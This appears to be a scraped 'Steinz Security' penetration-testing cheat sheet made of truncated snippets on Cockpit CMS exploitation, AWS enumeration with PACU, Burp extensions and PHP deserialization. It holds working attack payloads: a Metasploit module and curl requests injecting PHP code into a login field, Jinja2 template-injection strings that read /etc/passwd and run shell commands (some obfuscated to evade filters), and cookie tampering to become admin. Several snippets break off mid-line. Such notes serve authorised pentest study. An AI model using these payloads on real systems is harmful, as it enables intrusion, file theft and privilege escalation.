Steinz Security

 

  #Config File - API Key curl -kL http://10.10.10.10:9000/config.js

  Cockpit is an interactive server admin interface. It is easy to use and very lightweight. Cockpit interacts directly with the operating system from a real Linux session in a browser. Port: 9090 Github # Reset password (CVE-2020-35847) msf> use exploit/multi/cockpit_cms_rce msf> set USER admin msf> run #Find the Server info - search for string curl http://IP_ADdress:9090/ -o out.txt cat out.txt | grep "var environment" Known Exploits curl -X POST https://example.com/auth/check -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{"auth":{"user":"test'\'';phpinfo();'\''","password":"b"}}' curl -kL -X POST https://example.com/auth/requestreset -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{...

  Installation and Basic Commands curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip sudo ./aws/install #Login - Enter Client ID and Client_Secret aws configure #Login - Create a profile incase you have multiple accounts aws configure --profile Some_NAME #Get info about Access_key aws sts get-caller-identity --profile Some_NAME #Using Short Term Temp Creds aws configure set aws_access_key_id [key-id] --profile ec2 aws configure set aws_secret_access_key [key-id] --profile ec2 aws configure set aws_session_token [token] --profile ec2 aws sts get-caller-identity --profile ec2 Exploitation using PACU #Download and Install PACU pip3 install -U pacu #run pacu and create a session pacu 0 AWS-Pentest #Create AWS login Session - enter Access & Secret Key set_keys #Enum IAM permissions exec iam__enum_permissions #List all permission for the logged in user whoami #Enum EC2 Instances exec ec2__enum #List all the...

  Python - Flask #Checking for Vuln print(render_template_string("{{4*6}}")) #List Items {{config.items()}} #Slecting a class {{5000.__class__.mro()}} #Listing Sub Classes {{5000.__class__.__mro__[1].__subclasses__()}} {{ ''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')() }} #Read Files {{5000.__class__.__mro__[1].__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read()}} #RCE - Use any 1 from below {{5000.__class__.__mro__[1].__subclasses__()[364]('whoami',shell=True,stdout=-1).communicate()}} {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} print(''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__['__buil'+'tins__']['ev'+'al']('__imp'+'ort__("o...

  Agarta - Generate Payloads for Injections, RCE etc.. JSON Web Tokens - Easily recode the token and modify the request. Burp Bounty - Authorize - check Broken Access Control AuthMatrix - Auth Priv Esc Checks Broken Link Hijacking - Active Scan ++ J2EEScan Hackvertor - used for encodings of various types Param Miner - GadgetProbe - https://github.com/BishopFox/GadgetProbe Comes with wordlist Java Deserialization Scanner IIS Tilde Enumeration Scanner - Finds IIS 8.3 Shortname Vuln Browser Extensions Wappalyzer EditThisCookie DotGit Shodan

 Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream. The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize(). Basic Serialization - look for cookies with base64 encoded or some kind of searialzed you can update the admin;b:0 to admin;B:1 --> which makes us admin PHP - Exploiting Data Types - Look for cookies and any other serialized values - Update the user value or the username to any user - if required update the access token, serialize it and try to access unauthorized data Example Update the data from O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";} to O:4:"User":2:{s:...